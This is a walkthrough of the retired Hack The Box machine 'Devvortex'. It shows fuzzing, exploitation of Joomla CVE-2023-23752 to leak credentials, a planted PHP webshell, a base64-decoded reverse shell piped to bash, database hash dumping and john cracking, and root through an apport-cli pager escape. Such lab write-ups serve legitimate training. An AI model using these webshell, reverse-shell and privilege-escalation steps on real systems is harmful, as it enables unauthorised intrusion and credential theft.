0x2501

Intro

Devvortex is a retired, easy rated box on hackthebox. It features exploitation of a content management system, hash cracking and exploiting an application to escalate privileges on a linux machine.

Walktrough

Enumeration

Let's start with an nmap scan.

22 open ssh
80 open http

Accessing the webserver at port 80 redirects us to devvortex.htb, so let's add this one to /etc/hosts/. The site doesn't look too interesting. Maybe there are other sites hosted here.

Using ffuf to enumerate other sites:

ffuf -u http://devvortex.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host: FUZZ.devvortex.htb' --fw 4

We get a hit on dev.devvortex.htb, so let's add that to our hosts file.

Before starting any sort of manual enumeration, let's fuzz for some interesting endpoints:

ffuf -u http://dev.devvortex.htb/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt --fs 162

We get a hit on /administrator. Navigating to that endpoint shows that Joomla is used as a CMS. A way to enumerate the Joomlas version is accessing the joomla.xml file, which is usually atadministrator/manifests/files/joomla.xml Acessing this file, shows that Joomla version 4.2.6 is running.

Conducting a quick search, we find out that this version is vulnerable to CVE-2023-23752 for which public exploits exist.

Exploiting a vulnerable Joomla version

Let's have a quick look at the exploit:

[...]
def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end
[...]
def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end
[...]

Seems like we just have to access these endpoints.

curl -s http://dev.devvortex.htb/api/index.php/v1/users?public=true | jq
[...]
  "data": [
    {
      "type": "users",
      "id": "649",
      "attributes": {
        "id": 649,
        "name": "lewis",
        "username": "lewis",
        "email": "lewis@devvortex.htb",
        "block": 0,
        "sendEmail": 1,
        "registerDate": "2023-09-25 16:44:24",
        "lastvisitDate": "2023-10-29 16:18:50",
        "lastResetTime": null,
        "resetCount": 0,
        "group_count": 1,
        "group_names": "Super Users"
      }
    },
[...]

curl -s http://dev.devvortex.htb/api/index.php/v1/config/application?public=true | jq
[...]
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
[...]

I only included the interesting bits. Using the leaked credentials we are able to login.

Gaining RCE on the box

As an admin we can add code to various templates. I decided to add a webshell to error.php and then use it to gain a reverse shell.

Webshell:

<?php echo Text::_(system($_GET['cmd'])); ?>

Accessing the webshell: http://dev.devvortex.htb/media/templates/site/cassiopeia/js/main.js?cmd=$COMMAND

Reverse Shell

echo "$base64_encoded_reverse_shell" | base64 -d | bash

Host Enumeration

We can already assume that some sort of database is running, but let's confirm this by running netstat -tulnp. This shows that a database service is listening on it's default port. We can connect to it by using lewis' credentials. Then just dump the user table.

Dumping Credentials and cracking hashes

mysql> select * from sd4fg_users;

lewis:$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan:$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Let's check if a user named logan exists on this box, grep logan /etc/passwd. Logan is a user on this machine.

I decided to use john to crack Logans hash.

john --format=bcrypt hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

tequieromucho    (?)    

1g 0:00:00:05 DONE (2024-04-13 16:24) 0.1992g/s 279.6p/s 279.6c/s 279.6C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gains us logan:tequieromucho.

User Enumeration

Running sudo -l shows that logan is allowed to run apport-cli using sudo. A quick search on howto abuse this, shows that we might be able to abuse CVE-2023-1326 to gain root privileges.

I just wanted to be sure that apport doesn't crash or something so I first generated a valid crash report.

sudo /usr/bin/apport-cli -f --pid 17932 --save /var/crash/ex.crash && 
sudo /usr/bin/apport-cli -c /var/crash/ex.crash
!/bin/bash

We are now root.